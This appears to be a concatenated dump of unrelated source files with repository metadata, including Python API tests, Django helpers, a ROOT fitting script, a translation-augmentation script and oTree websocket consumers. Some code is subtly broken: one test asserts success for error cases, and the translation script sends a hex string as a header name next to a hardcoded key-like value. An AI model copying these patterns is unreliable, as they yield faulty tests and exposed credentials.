if self.case_name == 'goodsIdList错误': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'goodsIdList为空': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'manufacturerName正确': # 如果case_name是login,说明合法,返回的code应该为200
self.assertEqual(ss['code'], '000000')
if self.case_name == 'manufacturerName错误': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'manufacturerName为空': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'keywords正确': # 如果case_name是login,说明合法,返回的code应该为200
self.assertEqual(ss['code'], '000000')
if self.case_name == 'keywords错误': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'keywords为空': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'specification正确': # 如果case_name是login,说明合法,返回的code应该为200
self.assertEqual(ss['code'], '000000')
if self.case_name == 'specification错误': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'specification为空': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'dosageForm正确': # 如果case_name是login,说明合法,返回的code应该为200
self.assertEqual(ss['code'], '000000')
if self.case_name == 'dosageForm错误': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'dosageForm为空': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'serialNumberList正确': # 如果case_name是login,说明合法,返回的code应该为200
self.assertEqual(ss['code'], '000000')
if self.case_name == 'serialNumberList错误': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'serialNumberList为空': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'orderColumn正确': # 如果case_name是login,说明合法,返回的code应该为200
self.assertEqual(ss['code'], '000000')
if self.case_name == 'orderColumn正确': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'orderColumn为空': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'orderRule正确': # 如果case_name是login,说明合法,返回的code应该为200
self.assertEqual(ss['code'], '000000')
if self.case_name == 'orderRule错误': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'orderRule为空': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'statisticStart正确': # 如果case_name是login,说明合法,返回的code应该为200
self.assertEqual(ss['code'], '000000')
if self.case_name == 'statisticStart错误': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'statisticStart为空': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'statisticEnd正确': # 如果case_name是login,说明合法,返回的code应该为200
self.assertEqual(ss['code'], '000000')
if self.case_name == 'statisticEnd错误': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'statisticEnd为空': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'preferentialAmount正确': # 如果case_name是login,说明合法,返回的code应该为200
self.assertEqual(ss['code'], '000000')
if self.case_name == 'preferentialAmount错误': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'preferentialAmount为空': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'gift正确': # 如果case_name是login,说明合法,返回的code应该为200
self.assertEqual(ss['code'], '000000')
if self.case_name == 'gift错误': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'gift为空': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'specialSale正确': # 如果case_name是login,说明合法,返回的code应该为200
self.assertEqual(ss['code'], '000000')
if self.case_name == 'specialSale错误': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'specialSale为空': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'checkExpirationDate正确': # 如果case_name是login,说明合法,返回的code应该为200
self.assertEqual(ss['code'], '000000')
if self.case_name == 'checkExpirationDate错误': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'checkExpirationDate为空': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'preferential正确': # 如果case_name是login,说明合法,返回的code应该为200
self.assertEqual(ss['code'], '000000')
if self.case_name == 'preferential错误': # 同上
self.assertEqual(ss['code'], "000000")
if self.case_name == 'preferential为空': # 同上
self.assertEqual(ss['code'], "000000")
print("返回信息:" + ss['message'])
# if __name__ == '__main__': # 测试一下,我们读取配置文件的方法是否可用
# testUserLogin().checkResult()
| [
"553248560@.com"
] | 553248560@.com |
28bae8f3274478cae27342b125169091f3c11d2f | 935c60a8fa9a2f8d0efed9b1123a0a75e4c28250 | /censusreporter/apps/census/templatetags/sumlevs.py | 5eabc22d9189c83245fc75d7a4370fdf562a8e1b | [
"MIT"
] | permissive | censusreporter/censusreporter | a5299aebbec51d0508bdea6a90415ad2d724a2a5 | e8418d657b546482a80e92c6cd17332ab22c40c0 | refs/heads/master | 2023-08-31T23:10:43.506418 | 2023-08-25T16:05:46 | 2023-08-25T16:05:46 | 10,183,514 | 694 | 123 | MIT | 2023-02-15T19:03:00 | 2013-05-20T22:46:00 | HTML | UTF-8 | Python | false | false | 495 | py | from django import template
from census.utils import SUMMARY_LEVEL_DICT
register = template.Library()
@register.filter
def sumlev_name(sumlev):
if SUMMARY_LEVEL_DICT[sumlev]:
return SUMMARY_LEVEL_DICT[sumlev]['name']
return ''
@register.filter
def sumlev_name_plural(sumlev):
if SUMMARY_LEVEL_DICT[sumlev]:
return SUMMARY_LEVEL_DICT[sumlev]['plural']
return ''
@register.filter
def list_cut(itemlist, term):
return [ i for i in itemlist if not i == term ]
| [
"ryan.a.pitts@gmail.com"
] | ryan.a.pitts@gmail.com |
cfe688f0835102af0855fbac30fec0aad5293bcf | 0eaf0d3f0e96a839f2ef37b92d4db5eddf4b5e02 | /abc237/b.py | 77a5fc4125ebfbad2fd73a68cdf2011e23c51827 | [] | no_license | silphire/atcoder | b7b02798a87048757745d99e8564397d1ca20169 | f214ef92f13bc5d6b290746d5a94e2faad20d8b0 | refs/heads/master | 2023-09-03T17:56:30.885166 | 2023-09-02T14:16:24 | 2023-09-02T14:16:24 | 245,110,029 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 189 | py | h, w = map(int, input().split())
aa = [
list(map(int, input().split()))
for _ in range(h)
]
for x in range(w):
b = [aa[i][x] for i in range(h)]
print(' '.join(map(str, b))) | [
"silphire@gmail.com"
] | silphire@gmail.com |
240707e34591a5f96f21763228a52c2a2efccf8d | bdfd3889e1cc02f97b3e2dc0032ce0c9b59bf37e | /src/gork/contrib/gbase/context_processors.py | 63035d955323f3fdfe2e9991d70633f56e88470d | [
"MIT"
] | permissive | indexofire/gork | c85728953cfa9ab98c59b79a440d4e12212cbc4e | c5e172b896a51c15f358d3aabbcb66af837b54b2 | refs/heads/master | 2016-09-06T04:58:01.435002 | 2014-02-06T08:35:51 | 2014-02-06T08:35:51 | 9,260,830 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 425 | py | # -*- coding: utf-8 -*-
from django.conf import settings
def site_info(request):
return {
'SITE_NAME': getattr(settings, 'SITE_NAME', None),
'CODE_AUTHOR': getattr(settings, 'CODE_AUTHOR', None),
'TEMPLATE_AUTHOR': getattr(settings, 'TEMPLATE_AUTHOR', None),
'SITE_URL': getattr(settings, 'SITE_URL', None),
'SITE_DESCRIPTION': getattr(settings, 'SITE_DESCRIPTION', None),
}
| [
"indexofire@gmail.com"
] | indexofire@gmail.com |
93d50406711a9575123d20b27934aaf6d01e5e66 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02982/s044044811.py | 26dc9cd58c1c9f23cda90d6764b4c3a68593bf42 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 281 | py | import numpy as np
N,D = map(int,input().split())
x = np.array([[int(i) for i in input().split()] for _ in range(N)])
count = 0
for i in range(N):
for j in range(i+1,N):
if float.is_integer(np.linalg.norm(x[i][:]-x[j][:], ord=2)):
count += 1
print(count)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
d970b1196ea3e6aef62e8c6538c5f9e14955d85d | fb4afc975c4df4ea59366e6602a1359dc484aaa4 | /silvio/check_eta2_distribution_fit.py | fb40f599a34d5e475593ab6954b6d7d0154c1fed | [] | no_license | silviodonato/DijetRootTreeAnalyzer | b63181dc526f76cc67319f5c5292136fac522071 | a47fe92d1a6d6e35b030606fe6ee837bb0a4c2ca | refs/heads/master | 2021-06-24T10:45:34.198060 | 2019-06-04T15:19:38 | 2019-06-04T15:19:38 | 114,103,862 | 0 | 0 | null | 2018-12-04T15:19:11 | 2017-12-13T09:56:24 | C | UTF-8 | Python | false | false | 7,096 | py | import ROOT
import array
redoPlot = True
'''
ROOT.gROOT.SetBatch(0)
canv2 = ROOT.TCanvas()
'''
colors = [
ROOT.kBlack,
ROOT.kYellow+1,
ROOT.kRed,
ROOT.kMagenta,
ROOT.kBlue,
ROOT.kCyan+1,
ROOT.kGreen+1,
ROOT.kOrange,
ROOT.kPink,
ROOT.kViolet,
ROOT.kAzure,
ROOT.kTeal,
ROOT.kSpring,
ROOT.kGray,
]
colors = colors * 20
#bins = range(200,800,50)
#bins = range(-3,3)
#bins = [i*1./10. for i in range(-25,26)]
bins = [i*1./10. for i in range(-25,26,2)]
#bins = [60,70,80,90]
ROOT.gStyle.SetOptStat(0)
#fileName = "../0683324A-6D0D-8443-A441-7FDF9D0CF9EC.root"
fileName = "../data_ntuple_CR_nocut.root"
#fileName = "../data_trig_eff_eta2.5.root"
#fileName = "../data_trig_eff_eta2.5_skim_40.root"
denTrigger = "abs(jet2_eta)<2.5 && abs(jet1_eta)<2.5 && isr_pt>50"
#denTrigger = "isr_pt>40"
#denTrigger = "isr_pt>=70 && HLT_CaloScoutingHT250"
preselect = denTrigger + "&& 1" #
title = "Jet2 eta"
varX = "jet2_eta"
varX_nbins, varX_min, varX_max = 30,-2.5,2.5
varX_title = "m_{jj}"
fit_min = 320
#######################################################
N = 4
dijet_eta_max = 3
#canv.SetTitle(title)
preselect += "&& (%s < %d)"%(varX,varX_max)
file_ = ROOT.TFile(fileName)
tree = file_.Get("tree")
if not type(tree)==ROOT.TTree:
tree = file_.Get("rootTupleTree/tree")
#tree.Draw("dijet_eta >> deta(100,0,%f)"%dijet_eta_max,"%s && dijet_mass>300"%(preselect) ,"")
#deta = ROOT.gDirectory.Get("deta")
#deta.Draw("HIST")
#x = array.array('d',[i*1./N for i in range(N)])
#y = array.array('d',[0 for i in range(N)])
#deta.GetQuantiles(N,y,x)
#bins = list(y)
#funct = ROOT.TF1("funct","pol4",0,3)
#deta.Fit(funct)
#funct.Draw("same")
#canv.SaveAs("histoMjj.root")
c2 = ROOT.TCanvas("c2","")
#c2.SetLogz()
import copy
g = ROOT.TGraph2D()
chi2 = {}
histos=[]
fits = []
for i in range(len(bins)-1):
preselect = denTrigger + "&& (jet1_eta)>%f && (jet1_eta)<%f"%(bins[i],bins[i+1]) #
tree.Draw("%s >> histo(%f,%f,%f)"%(varX,varX_nbins,varX_min,varX_max),"%s"%(preselect) ,"")
histo = ROOT.gDirectory.Get("histo")
histos.append(histo.Clone("%s < DijetMass < %s"%((round(bins[i],2)),round(bins[i+1],2))))
leg = ROOT.TLegend(0.52,0.7,0.9,0.9)
#leg.SetHeader("")
for i,histo in enumerate(histos):
histo.SetTitle("")
histo.GetXaxis().SetTitle("m(jj)")
histo.GetYaxis().SetTitle("AU")
histo.Sumw2()
histo.Scale(1./histo.Integral(-1,varX_nbins))
leg.AddEntry(histo,histo.GetName(),"l")
histo.SetLineColor(colors[i])
histo.SetLineWidth(2)
histo.SetMinimum(0)
histo.SetMaximum(2.*histo.GetMaximum())
# fit = ROOT.TF1("fit"+str(i),"gaus(0)+gaus(3)", varX_min, varX_max)
# fit.SetParameters(0.082, 2.7, -1, 0.03, 0.5, -2.0)
fit = ROOT.TF1("fit"+str(i),"gaus(0)", varX_min, varX_max)
fit.SetParameters(0.05, 0.01, 1.7)
fit.SetLineColor(colors[i])
fitr = histo.Fit(fit,"","",varX_min, varX_max)
fits.append(copy.deepcopy(fit))
print(fits[i].GetParameter(1))
# histos[-1].Fit(fit,"","",varX_min, varX_max)
for i,histo in enumerate(histos):
if i==0:
histo.Draw("ERR")
# histo.Draw("HIST,same")
else:
histo.Draw("ERR,same")
# histo.Draw("HIST,same")
print(fits[i].GetParameter(1))
fits[i].Draw("same")
#c2.SetLogy()
leg.Draw()
c2.SaveAs("eta2plotcheck.png")
c2.SaveAs("eta2plotcheck.pdf")
#g.Draw("LEGO")c2.SaveAs("plotDetacheck.png")
means = ROOT.TGraphErrors()
sigmas = ROOT.TGraphErrors()
for graph in [means,sigmas]:
npar = 2
if graph==means:
npar = 1
for i,fit in enumerate(fits):
val = (bins[i]+bins[i+1])/2
err = (float(bins[i+1])-bins[i])/2
graph.SetPoint(i,val,fit.GetParameter(npar))
graph.SetPointError(i,err,fit.GetParError(npar))
c3 = ROOT.TCanvas("c3")
means.Draw("APL")
means_fit = ROOT.TF1("means_fit","pol1")
means.Fit(means_fit)
c3.SaveAs("means.png")
c4 = ROOT.TCanvas("c4")
sigmas.Draw("APL")
sigmas_fit = ROOT.TF1("sigmas_fit","pol2")
sigmas_fit.SetParameters(2,0,-0.001)
sigmas.Fit(sigmas_fit)
c4.SaveAs("sigmas.png")
'''
import ROOT
import array
redoPlot = True
'''
ROOT.gROOT.SetBatch(0)
canv2 = ROOT.TCanvas()
'''
colors = [
ROOT.kBlack,
ROOT.kYellow+1,
ROOT.kRed,
ROOT.kMagenta,
ROOT.kBlue,
ROOT.kCyan+1,
ROOT.kGreen+1,
ROOT.kOrange,
ROOT.kPink,
ROOT.kViolet,
ROOT.kAzure,
ROOT.kTeal,
ROOT.kSpring,
ROOT.kGray,
]
#bins = range(200,800,50)
bins = range(-3,3)
#bins = [i/10. for i in range(-30,30)]
#bins = [60,70,80,90]
ROOT.gStyle.SetOptStat(0)
fileName = "../data_trig_eff_eta2.5.root"
#fileName = "../data_trig_eff_eta2.5_skim_40.root"
denTrigger = "1"
#denTrigger = "isr_pt>40"
#denTrigger = "isr_pt>=70 && HLT_CaloScoutingHT250"
preselect = denTrigger + "&& 1" #
title = "Jet2 eta"
varX = "jet2_eta"
varX_nbins, varX_min, varX_max = 30,-3,3
varX_title = "m_{jj}"
fit_min = 320
#######################################################
N = 4
dijet_eta_max = 3
#canv.SetTitle(title)
preselect += "&& (%s < %d)"%(varX,varX_max)
file_ = ROOT.TFile(fileName)
tree = file_.Get("tree")
if not type(tree)==ROOT.TTree:
tree = file_.Get("rootTupleTree/tree")
#tree.Draw("dijet_eta >> deta(100,0,%f)"%dijet_eta_max,"%s && dijet_mass>300"%(preselect) ,"")
#deta = ROOT.gDirectory.Get("deta")
#deta.Draw("HIST")
#x = array.array('d',[i*1./N for i in range(N)])
#y = array.array('d',[0 for i in range(N)])
#deta.GetQuantiles(N,y,x)
#bins = list(y)
#funct = ROOT.TF1("funct","pol4",0,3)
#deta.Fit(funct)
#funct.Draw("same")
#canv.SaveAs("histoMjj.root")
c2 = ROOT.TCanvas("c2","")
#c2.SetLogz()
import copy
g = ROOT.TGraph2D()
chi2 = {}
histos=[]
fits = []
for i in range(len(bins)-1):
preselect = denTrigger + "&& (jet1_eta)>%f && (jet1_eta)<%f"%(bins[i],bins[i+1]) #
tree.Draw("%s >> histo(%f,%f,%f)"%(varX,varX_nbins,varX_min,varX_max),"%s"%(preselect) ,"")
histo = ROOT.gDirectory.Get("histo")
histos.append(histo.Clone("%s < DijetMass < %s"%((round(bins[i],2)),round(bins[i+1],2))))
leg = ROOT.TLegend(0.52,0.7,0.9,0.9)
#leg.SetHeader("")
for i,histo in enumerate(histos):
histo.SetTitle("")
histo.GetXaxis().SetTitle("m(jj)")
histo.GetYaxis().SetTitle("AU")
histo.Sumw2()
histo.Scale(1./histo.Integral(-1,varX_nbins))
leg.AddEntry(histo,histo.GetName(),"l")
histo.SetLineColor(colors[i])
histo.SetLineWidth(2)
histo.SetMinimum(3E-2)
histo.SetMaximum(2.*histo.GetMaximum())
fit = ROOT.TF1("fit"+str(i),"gaus(0)+gaus(3)", varX_min, varX_max)
fit.SetParameters(0.082, 2.7, -1, 0.03, 0.5, -2.0)
fit.SetLineColor(colors[i])
histo.Fit(fit,"","",varX_min, varX_max)
fits.append(copy.deepcopy(fit))
print(fits[i].GetParameter(1))
# histos[-1].Fit(fit,"","",varX_min, varX_max)
for i,histo in enumerate(histos):
if i==0:
histo.Draw("ERR")
# histo.Draw("HIST,same")
else:
histo.Draw("ERR,same")
# histo.Draw("HIST,same")
print(fits[i].GetParameter(1))
fits[i].Draw("same")
#c2.SetLogy()
leg.Draw()
c2.SaveAs("eta2plotcheck.png")
c2.SaveAs("eta2plotcheck.pdf")
#g.Draw("LEGO")c2.SaveAs("plotDetacheck.png")
''' | [
"silvio.donato@cern.ch"
] | silvio.donato@cern.ch |
09d2b162d3aa555c6e0bdf0745efa0aa7326c043 | a8b37bd399dd0bad27d3abd386ace85a6b70ef28 | /airbyte-integrations/connectors/source-github/unit_tests/unit_test.py | e7e3adf6bf81d5be520adfda3c14e9fdddcb3859 | [
"MIT",
"LicenseRef-scancode-free-unknown",
"Elastic-2.0"
] | permissive | thomas-vl/airbyte | 5da2ba9d189ba0b202feb952cadfb550c5050871 | 258a8eb683634a9f9b7821c9a92d1b70c5389a10 | refs/heads/master | 2023-09-01T17:49:23.761569 | 2023-08-25T13:13:11 | 2023-08-25T13:13:11 | 327,604,451 | 1 | 0 | MIT | 2021-01-07T12:24:20 | 2021-01-07T12:24:19 | null | UTF-8 | Python | false | false | 912 | py | #
# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
from airbyte_cdk.sources.streams.http.auth import MultipleTokenAuthenticator
from source_github import SourceGithub
def test_single_token():
authenticator = SourceGithub()._get_authenticator({"access_token": "123"})
assert isinstance(authenticator, MultipleTokenAuthenticator)
assert ["123"] == authenticator._tokens
authenticator = SourceGithub()._get_authenticator({"credentials": {"access_token": "123"}})
assert ["123"] == authenticator._tokens
authenticator = SourceGithub()._get_authenticator({"credentials": {"personal_access_token": "123"}})
assert ["123"] == authenticator._tokens
def test_multiple_tokens():
authenticator = SourceGithub()._get_authenticator({"access_token": "123, 456"})
assert isinstance(authenticator, MultipleTokenAuthenticator)
assert ["123", "456"] == authenticator._tokens
| [
"noreply@github.com"
] | thomas-vl.noreply@github.com |
4e0405087a86e930b76e5c4543867e7bfb2d61ac | e21599d08d2df9dac2dee21643001c0f7c73b24f | /Others/Modules/networking/ftplib/ftplib_1.py | f35db835c9a52e0f8890ef3ecb682380536ab8d7 | [] | no_license | herolibra/PyCodeComplete | c7bf2fb4ce395737f8c67749148de98a36a71035 | 4ef7d2c3aec6d28a53eed0e649cdeb74df3d783b | refs/heads/master | 2022-07-17T05:39:03.554760 | 2020-05-03T07:00:14 | 2020-05-03T07:00:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 137 | py | # coding=utf-8
import ftplib
ftp = ftplib.FTP("www.python.org")
ftp.login("anonymous", "ftplib-example-1")
print ftp.dir()
ftp.quit()
| [
"ijumper@163.com"
] | ijumper@163.com |
52a3c79244a82acf35e998f0e5141dfb252fbecd | 9c58a1f594e18cee20128f2c8dad8257429b10d1 | /dropship_taw/__init__.py | 19bff6f8b78c84ee375ecd71cae1ee626628df77 | [] | no_license | gastonfeng/Odoo-eBay-Amazon | e8919768b2a1500209f209ee3aecc7f2fb10cda7 | a9c4a8a7548b19027bc0fd904f8ae9249248a293 | refs/heads/master | 2022-04-05T00:23:50.483430 | 2020-02-19T04:58:56 | 2020-02-19T04:58:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 76 | py | # -*- coding: utf-8 -*-
import models
import purchase
import stock_picking
| [
"yjm@mail.ru"
] | yjm@mail.ru |
85ae1095cbcec3fa5bc1d2dbb7910389e4b86fd0 | 98c6ea9c884152e8340605a706efefbea6170be5 | /examples/data/Assignment_6/cshjam001/question4.py | eaf38914b99ae858c1fb572ee3dd0ae6cf19b467 | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 552 | py | marks=input('Enter a space-separated list of marks:\n')
marks_list=marks.split(' ')
marks_list = [int(i) for i in marks_list]
fail=0
third=0
low_second=0
up_second=0
first=0
for i in marks_list:
if i<50:
fail+=1
elif i<60:
third+=1
elif i<70:
low_second+=1
elif i<75:
up_second+=1
elif i>=75:
first+=1
print('1 |','X'*first,sep='')
print('2+|','X'*up_second,sep='')
print('2-|','X'*low_second,sep='')
print('3 |','X'*third,sep='')
print('F |','X'*fail,sep='')
| [
"jarr2000@gmail.com"
] | jarr2000@gmail.com |
c8087889a488b72efcbfe902393e594a35f0fbde | 2bdedcda705f6dcf45a1e9a090377f892bcb58bb | /src/main/output/face/force/side/test_government.py | e3bae4e0b77290e42845a540c14f38df61fdd566 | [] | no_license | matkosoric/GenericNameTesting | 860a22af1098dda9ea9e24a1fc681bb728aa2d69 | 03f4a38229c28bc6d83258e5a84fce4b189d5f00 | refs/heads/master | 2021-01-08T22:35:20.022350 | 2020-02-21T11:28:21 | 2020-02-21T11:28:21 | 242,123,053 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,376 | py | # -*- coding: utf-8 -*-
import pandas as pd
import http.client, urllib.parse
from googletrans import Translator
# **********************************************
# *** Update or verify the following values. ***
# **********************************************
# Replace the subscriptionKey string value with your valid subscription key.
target_list = [ "bg", "zh-TW", "iw"]
def translate(text, target="zh-TW", mode='google'):
if mode == 'microsoft':
subscriptionKey = 'a5d3d77c3cf5eb42280cd4bca60e55c1'
host = 'api.microsofttranslator.com'
path = '/V2/Http.svc/Translate'
import xml.etree.ElementTree as ET
def get_suggestions (text, target):
params = '?to=' + target + '&text=' + urllib.parse.quote (text)
headers = {'fb54a99315ae023d88c6a52b004c2335': subscriptionKey}
conn = http.client.HTTPSConnection(host)
conn.request ("GET", path + params, None, headers)
response = conn.getresponse ()
ret = response.read ()
ret = ET.fromstring(ret).text
return ret
return get_suggestions((get_suggestions(text, target)), 'en')
else:
translator = Translator()
tmp = translator.translate(text, dest=target).text
return translator.translate(tmp).text
if __name__ == '__main__':
class_names = ["toxic", "severe_toxic", "obscene", "threat", "insult", "identity_hate"]
import pandas as pd
from tqdm import tqdm
train = pd.read_csv('input/train_clean.csv')
ln = len(train)
# while True:
# x = input()
# print(translate(x))
# print(translate(x, mode='microsoft'))
for i in tqdm(range(ln)):
row = train.iloc[i,:]
data = dict(row)
text = data['comment_text']
# assert type(text)==str
# urllib.parse.quote('')
# continue
# try:
data['comment_text'] = translate(text)
train = train.append(data, ignore_index=True)
# except Exception as e:
# print(text)
# print(e)
# try:
# data['comment_text'] = translate(text, mode='microsoft')
# train = train.append(data, ignore_index=True)
# except Exception as e:
# print(text)
# print(e)
print(train.shape)
train.to_csv('train_augmented.csv', index=False)
| [
"soric.matko@gmail.com"
] | soric.matko@gmail.com |
e9e43aa177be41984ff8110f21f4c8529b3b158b | 4352e2e26d7d3bc6b56b65bbe7f5d972735ecc1a | /otree/channels/consumers.py | c0c079f02787550dc2a27194295444360d10f6ce | [
"MIT"
] | permissive | bgreiner/otree-core | a429c1727df1db2f88142a36ca1ff2c0fda6938c | cc21335ec16d1a91c2b7940163077c37c659599f | refs/heads/master | 2020-03-30T19:51:59.206973 | 2018-10-24T14:08:00 | 2018-10-24T14:08:00 | 151,562,644 | 0 | 0 | NOASSERTION | 2018-10-04T11:41:47 | 2018-10-04T11:41:47 | null | UTF-8 | Python | false | false | 17,183 | py | import json
import logging
import django.db
import django.utils.timezone
import traceback
import time
from channels import Group
from channels.generic.websockets import JsonWebsocketConsumer
from django.core.signing import Signer, BadSignature
import otree.session
from otree.channels.utils import get_chat_group
from otree.models import Participant, Session
from otree.models_concrete import (
CompletedGroupWaitPage, CompletedSubsessionWaitPage, ChatMessage)
from otree.common_internal import (
get_models_module
)
import otree.channels.utils as channel_utils
from otree.models_concrete import (
FailedSessionCreation, ParticipantRoomVisit,
FAILURE_MESSAGE_MAX_LENGTH, BrowserBotsLauncherSessionCode)
from otree.room import ROOM_DICT
import otree.bots.browser
from otree.export import export_wide, export_app
import io
import base64
import datetime
from django.conf import settings
logger = logging.getLogger(__name__)
class InvalidWebSocketParams(Exception):
'''exception to raise when websocket params are invalid'''
class OTreeJsonWebsocketConsumer(JsonWebsocketConsumer):
'''
THIS IS NOT PUBLIC API.
Third party apps should not subclass this.
Either copy this class into your code,
or subclass directly from JsonWebsocketConsumer,
'''
def raw_connect(self, message, **kwargs):
try:
super().raw_connect(message, **kwargs)
except InvalidWebSocketParams:
logger.warning('Rejected request: {}'.format(self.path))
def clean_kwargs(self, **kwargs):
'''
subclasses should override if the route receives a comma-separated params arg.
otherwise, this just passes the route kwargs as is (usually there is just one).
The output of this method is passed to self.group_name(), self.post_connect,
and self.pre_disconnect, so within each class, all 3 of those methods must
accept the same args (or at least take a **kwargs wildcard, if the args aren't used)
'''
return kwargs
def group_name(self, **kwargs):
raise NotImplementedError()
def connection_groups(self, **kwargs):
kwargs = self.clean_kwargs(**kwargs)
group_name = self.group_name(**kwargs)
return [group_name]
def connect(self, message, **kwargs):
# don't send accept: True until we upgrade to channels 1.0+
# self.message.reply_channel.send({"accept": True})
# only wrap this for connect. it's not as high-priority for
# disconnect or receive.
kwargs = self.clean_kwargs(**kwargs)
self.post_connect(**kwargs)
def post_connect(self, **kwargs):
pass
def disconnect(self, message, **kwargs):
kwargs = self.clean_kwargs(**kwargs)
self.pre_disconnect(**kwargs)
def pre_disconnect(self, **kwargs):
pass
def receive(self, content, **kwargs):
kwargs = self.clean_kwargs(**kwargs)
self.post_receive(content, **kwargs)
def post_receive(self, content, **kwargs):
pass
class GroupByArrivalTime(OTreeJsonWebsocketConsumer):
def clean_kwargs(self, params):
session_pk, page_index, app_name, player_id = params.split(',')
return {
'app_name': app_name,
'session_pk': int(session_pk),
'page_index': int(page_index),
'player_id': int(player_id)
}
def group_name(self, app_name, player_id, page_index, session_pk):
gn = channel_utils.gbat_group_name(
session_pk, page_index)
return gn
def post_connect(self, app_name, player_id, page_index, session_pk):
models_module = get_models_module(app_name)
group_id_in_subsession = models_module.Group.objects.filter(
player__id=player_id).values_list(
'id_in_subsession', flat=True)[0]
ready = CompletedGroupWaitPage.objects.filter(
page_index=page_index,
id_in_subsession=int(group_id_in_subsession),
session_id=session_pk,
).exists()
if ready:
self.send({'status': 'ready'})
class WaitPage(OTreeJsonWebsocketConsumer):
def clean_kwargs(self, params):
session_pk, page_index, group_id_in_subsession = params.split(',')
return {
'session_pk': int(session_pk),
'page_index': int(page_index),
# don't convert group_id_in_subsession to int yet, it might be null
'group_id_in_subsession': group_id_in_subsession,
}
def group_name(self, session_pk, page_index, group_id_in_subsession):
return channel_utils.wait_page_group_name(
session_pk, page_index, group_id_in_subsession)
def post_connect(self, session_pk, page_index, group_id_in_subsession):
# in case message was sent before this web socket connects
if group_id_in_subsession:
ready = CompletedGroupWaitPage.objects.filter(
page_index=page_index,
id_in_subsession=int(group_id_in_subsession),
session_id=session_pk,
).exists()
else: # subsession
ready = CompletedSubsessionWaitPage.objects.filter(
page_index=page_index,
session_id=session_pk,
).exists()
if ready:
self.send({'status': 'ready'})
class AutoAdvance(OTreeJsonWebsocketConsumer):
def clean_kwargs(self, params):
participant_code, page_index = params.split(',')
return {
'participant_code': participant_code,
'page_index': int(page_index),
}
def group_name(self, page_index, participant_code):
return 'auto-advance-{}'.format(participant_code)
def post_connect(self, page_index, participant_code):
# in case message was sent before this web socket connects
result = Participant.objects.filter(
code=participant_code).values_list(
'_index_in_pages', flat=True)
try:
page_should_be_on = result[0]
except IndexError:
# doesn't get shown because not yet localized
self.send({'error': 'Participant not found in database.'})
return
if page_should_be_on > page_index:
self.send({'auto_advanced': True})
def create_session(message):
group = Group(message['channels_group_name'])
kwargs = message['kwargs']
try:
session = otree.session.create_session(**kwargs)
if message['use_browser_bots']:
otree.bots.browser.initialize_session(
session_pk=session.pk,
case_number=None
)
session.ready_for_browser = True
session.save()
except Exception as e:
# full error message is printed to console (though sometimes not?)
error_message = 'Failed to create session: "{}"'.format(e)
traceback_str = traceback.format_exc()
group.send(
{'text': json.dumps(
{
'error': error_message,
'traceback': traceback_str,
})}
)
FailedSessionCreation.objects.create(
pre_create_id=kwargs['pre_create_id'],
message=error_message[:FAILURE_MESSAGE_MAX_LENGTH],
traceback=traceback_str
)
raise
group.send(
{'text': json.dumps(
{'status': 'ready'})}
)
if 'room_name' in kwargs:
Group(channel_utils.room_participants_group_name(kwargs['room_name'])).send(
{'text': json.dumps(
{'status': 'session_ready'})}
)
class WaitForSession(OTreeJsonWebsocketConsumer):
def clean_kwargs(self, **kwargs):
return kwargs
def group_name(self, pre_create_id):
return channel_utils.create_session_group_name(pre_create_id)
def post_connect(self, pre_create_id):
group_name = self.group_name(pre_create_id)
# in case message was sent before this web socket connects
if Session.objects.filter(
_pre_create_id=pre_create_id, ready_for_browser=True).exists():
self.group_send(group_name, {'status': 'ready'})
else:
failure = FailedSessionCreation.objects.filter(
pre_create_id=pre_create_id
).first()
if failure:
self.group_send(group_name,
{'error': failure.message,
'traceback': failure.traceback})
class RoomAdmin(OTreeJsonWebsocketConsumer):
def group_name(self, room):
